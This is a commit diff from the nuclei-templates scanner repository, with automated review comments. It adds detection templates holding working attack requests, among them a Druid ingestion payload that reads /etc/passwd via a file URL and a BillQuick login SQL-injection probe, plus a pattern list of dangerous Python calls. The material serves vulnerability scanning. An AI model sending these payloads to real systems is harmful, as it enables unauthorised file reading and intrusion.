Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CNVD-2019-06255
commit
50d1f3753d
|
@ -20,10 +20,8 @@ jobs:
|
|||
|
||||
- name: Installing Nuclei
|
||||
# if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
|
|
|
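Review bot: The `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@…` step resolves a moving ref (`@dev` or `@latest`, whichever is the new side here, since the page has lost its +/- markers), so the Template Validation job runs whatever upstream publishes at that moment and a given run cannot be reproduced. Pinning to a release tag, e.g. `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@vX.Y.Z` (placeholder version), keeps validation results stable and limits what an upstream compromise can push into CI. Separately, `GO111MODULE: on` is safer written as `GO111MODULE: "on"`, because `on` is a boolean to YAML 1.1 parsers. The job's remaining steps are outside this hunk.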
@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
||||
|
||||
**176 directories, 2418 files**.
|
||||
**177 directories, 2443 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-36749
|
||||
|
||||
info:
|
||||
name: Apache Druid Authentication Restrictions Bypass
|
||||
author: _0xf4n9x_
|
||||
severity: medium
|
||||
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
|
||||
- https://www.cvedetails.com/cve/CVE-2021-36749/
|
||||
- https://github.com/BrucessKING/CVE-2021-36749
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.5
|
||||
cve-id: CVE-2021-36749
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,apache,lfi,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "druid:*:1000:1000:"
|
||||
condition: or
|
|
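Review bot: The second pattern in the regex matcher, `"druid:*:1000:1000:"`, quantifies the colon instead of matching the password field, so a passwd line such as `druid:x:1000:1000:` (constructed example) is not matched; `- "druid:.*:1000:1000:"` would mirror the `root:.*:0:0:` pattern above it. In `classification`, the vector `C:H/I:H/A:H` with `PR:L` computes to 8.8, which contradicts `cvss-score: 6.5` and `severity: medium`. A vector that yields 6.5 is `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`; confirm it against the NVD reference listed in the file. `matchers-condition: and` has no effect with a single matcher, so either drop it or add a `status` matcher for it to combine with.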
@ -0,0 +1,64 @@
|
|||
id: CVE-2021-42258
|
||||
|
||||
info:
|
||||
name: BillQuick Web Suite SQLi
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
tags: cve,cve2021,sqli,billquick
|
||||
description: |
|
||||
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
|
||||
allows SQL injection for unauthenticated remote code execution,
|
||||
as exploited in the wild in October 2021 for ransomware installation.
|
||||
SQL injection can, for example, use the txtID (aka username) parameter.
|
||||
Successful exploitation can include the ability to execute
|
||||
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
|
||||
reference:
|
||||
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: xpath
|
||||
name: VS
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__VIEWSTATE']"
|
||||
|
||||
- type: xpath
|
||||
name: VSG
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
|
||||
|
||||
- type: xpath
|
||||
name: EV
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- "System.Data.SqlClient.SqlException"
|
||||
- "Incorrect syntax near"
|
||||
- "_ACCOUNTLOCKED"
|
|
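Review bot: The `info` block has no `classification` section, unlike the CVE-2021-36749 template added in the same commit, so a finding from this template carries no machine-readable CVE or CWE id. Adding `classification:` with `cve-id: CVE-2021-42258` and `cwe-id: CWE-89` would close that gap. The CVSS fields should be copied from the NVD entry already listed under `reference` rather than guessed, and `severity: high` checked against that entry at the same time.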
@ -0,0 +1,22 @@
|
|||
id: redis-commander-exposure
|
||||
|
||||
info:
|
||||
name: Redis Commander Exposure
|
||||
author: dahse89
|
||||
severity: low
|
||||
reference:
|
||||
- https://joeferner.github.io/redis-commander/
|
||||
- https://github.com/joeferner/redis-commander
|
||||
tags: panel,redis
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "<title>Redis Commander"
|
||||
- "redisCommanderBearerToken"
|
|
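Review bot: This new template has no `description`, while the rest of the commit is adding descriptions to existing templates. Something like `description: The Redis Commander web interface is reachable without authentication.` would fit, if that is what a match implies; the matcher itself only shows that the page title and the `redisCommanderBearerToken` string are present. The word matcher also omits `part`, so it relies on the default; `part: body` makes the intent explicit.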
@ -4,7 +4,7 @@ info:
|
|||
name: Python Scanner
|
||||
author: majidmc2
|
||||
severity: info
|
||||
description: Scan for dangerous Python functions
|
||||
description: Indicators for dangerous Python functions
|
||||
reference:
|
||||
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
|
||||
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
|
||||
|
@ -17,7 +17,7 @@ file:
|
|||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: Possible Code Injection
|
||||
name: code-injection
|
||||
regex:
|
||||
- 'exec'
|
||||
- 'eval'
|
||||
|
@ -25,7 +25,7 @@ file:
|
|||
|
||||
|
||||
- type: regex
|
||||
name: Possible Command Injection
|
||||
name: command-injection
|
||||
regex:
|
||||
- 'subprocess.call\(.*shell=True.*\)'
|
||||
- 'os.system'
|
||||
|
@ -33,18 +33,18 @@ file:
|
|||
|
||||
|
||||
- type: regex
|
||||
name: Possibly Unpickling untrusted source
|
||||
name: untrusted-source
|
||||
regex:
|
||||
- 'pickle.loads'
|
||||
- 'cPickle.loads'
|
||||
|
||||
|
||||
- type: regex
|
||||
name: Possibly loading dangerous YAMLs
|
||||
name: dangerous-yaml
|
||||
regex:
|
||||
- 'yaml.load'
|
||||
|
||||
- type: regex
|
||||
name: Possible SQLi
|
||||
name: sqli
|
||||
regex:
|
||||
- 'cursor.execute'
|
|
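Review bot: The new extractor name `untrusted-source` no longer says which sink it flags; the lines under it match `pickle.loads` and `cPickle.loads`, so a name such as `unsafe-pickle` would keep the meaning of the old label (this reads the second of each printed pair as the new side, since the +/- markers are lost). The patterns are unchanged context, but `'exec'` and `'eval'` match any substring, so a source line calling `cursor.execute` is reported under both `code-injection` and `sqli`; `'\bexec\s*\('` and `'\beval\s*\('` would narrow that. The dots in `pickle.loads`, `yaml.load`, `os.system` and `cursor.execute` are unescaped and match any character. The `file:` block starts above these hunks.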
@ -4,7 +4,7 @@ info:
|
|||
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
|
||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
|
||||
reference: https://www.exploit-db.com/exploits/49986
|
||||
tags: solarlog,auth-bypass
|
||||
|
||||
|
|
|
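Review bot: The replacement `description` reads "allows arbitrary remote attackers gain administrative privileges", which is missing "to" before "gain". The description lines added in later sections of this commit have similar slips: "accesing" (Unauthenticated Spark REST API), "acccessible" (SMTP WP Plugin Directory listing), "contain a vulnerability" (WebUI 1.5b6 RCE) and "the response return by the server" (WEMS Enterprise Manager). These strings presumably surface in scan output, so they are worth correcting in the same change.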
@ -3,6 +3,7 @@ info:
|
|||
name: UEditor Arbitrary File Upload
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
|
||||
reference:
|
||||
- https://zhuanlan.zhihu.com/p/85265552
|
||||
- https://www.freebuf.com/vuls/181814.html
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: Unauthenticated Spark REST API
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
|
||||
reference: https://xz.aliyun.com/t/2490
|
||||
tags: spark,unauth
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
|
||||
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
||||
tags: crlf,viewlinc
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
|
||||
reference: https://www.exploit-db.com/exploits/48877
|
||||
tags: auth-bypass
|
||||
requests:
|
||||
|
|
|
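Review bot: The `description` (apparently the line this hunk adds) attributes the bypass to SQL injection in the 'password' parameter, but `tags` is still only `auth-bypass`, so a run filtered on the `sqli` tag skips this template. `tags: auth-bypass,sqli` would match the tag used by the BillQuick template in this commit. The `requests:` block begins on the last line of this hunk and continues outside it.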
@ -3,6 +3,7 @@ info:
|
|||
name: WebUI 1.5b6 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
|
||||
reference: https://www.exploit-db.com/exploits/36821
|
||||
tags: webui,rce
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: xss
|
||||
|
||||
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: SMTP WP Plugin Directory listing enabled
|
||||
author: PR3R00T
|
||||
severity: high
|
||||
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
|
||||
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
||||
tags: wordpress,wp-plugin
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||
reference: https://cxsecurity.com/issue/WLB-2020030183
|
||||
tags: wordpress,wp-theme,redirect
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||
reference: https://cxsecurity.com/issue/WLB-2020040103
|
||||
tags: wordpress,wp-plugin,redirect
|
||||
|
||||
|
|
|
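Review bot: The name and description call this a theme, yet `tags` is `wordpress,wp-plugin,redirect`; the Attitude theme template in the preceding section uses `wp-theme`. `tags: wordpress,wp-theme,redirect` would keep tag-based selection consistent between the two. The tags line is unchanged context here, so this may be better handled as a follow-up.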
@ -3,6 +3,7 @@ info:
|
|||
name: WordPress accessible wp-config
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
|
||||
severity: high
|
||||
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
|
||||
tags: wordpress,backup
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Oxygen-Theme Themes LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
|
||||
tags: wordpress,wp-theme,lfi
|
||||
reference: https://cxsecurity.com/issue/WLB-2019030178
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: wordpress-upload-data
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: Searches for Passwords in the wordpress uploads directory.
|
||||
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
|
||||
reference: https://www.exploit-db.com/ghdb/7040
|
||||
tags: wordpress,listing
|
||||
|
||||
|
|